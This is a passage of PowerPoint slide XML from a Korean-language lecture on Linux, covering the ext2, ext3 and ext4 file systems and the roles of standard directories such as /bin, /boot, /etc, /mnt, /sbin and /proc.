            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXT 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Extended File System 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파일시스템 크기는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>terabyte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이상</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>커널</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용가능</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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXT 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Extended File System 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Journaling (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일복구 기능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>데이터 안전하게 보호</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비트 내부 주소</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파일크기 최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2TB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXT 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Extended File System 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대용량 파일 시스템 지원</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디스크 단편화 문제 대한 성능 증가</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타임 스탬프를 개선</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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/Theory/T3/FSSTND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 표준</a:t>
            </a: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/bin</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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기본 명령어 파일들이 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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대부분의 일반적인 명령어들 포함</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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기본 실행 명령어 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/Theory/T3/FSSTND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 파일시스템 표준</a:t>
            </a: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a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CD/DVD </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>또는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>FDD, USB </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>등이 임시로 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>마운트되는</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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가상 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>머신으로</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 리눅스 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>설치시</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>비어있음</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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임시 마운트 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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사용자 관리를 위한 암호 관련 파일</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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시스템 설정 파일 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>리눅스 시스템의 최상위 디렉토리</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t>디렉토리 구조의 시작</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t>리눅스는 루트</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>(/)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="100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bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>루트</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>(Root) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>FTP, www </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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원격접속을 시도하는 사용자들을 위한 공간으로 사용</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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일반 사용자들의 홈 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>usr</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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사용자가 사용할 응용 패키지 프로그램 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>설치시</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 사용</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="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a:t>윈도우 운영체제에서의 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>[Program Files]</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t>와 같은 역할</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
            </a:p>
            <a:p>
              <a:pPr marL="171450" indent="-171450" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="100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응용 패키지 프로그램 설치 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/boot</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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각종 리눅스 부트에 필요한 부팅 지원 파일들</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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부팅 관련 파일 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/bin</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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기본 명령어 파일들이 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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대부분의 일반적인 명령어들 포함</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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기본 실행 명령어 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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각 장치를 설치하는데 필요한 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>정보 저장</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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시스템 디바이스 장치 파일 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/lib</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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프로그램들의 라이브러리들 존재</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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평소에는 파일 크기를 줄여서 존재</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>라이브러리 실행 시 풀어서 사용</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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공유 라이브러리 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mnt</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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각종 입출력 장치와 연결할 때 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>마운트하게</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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가상 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>머신으로</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 리눅스 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>설치시</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>비어있음</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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입출력 장치 연결 마운트 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>sbin</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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시스템 관리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>부팅</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>복구</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>보수 등</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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관리자 계정</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(root)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>만이 사용할 수 있는 명령어들로 구성</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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시스템 운영 명령어 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/proc</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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각종 프로세스와 프로그램 정보 및 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>하드웨어적인</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i="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가상 파일 시스템 디렉토리</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
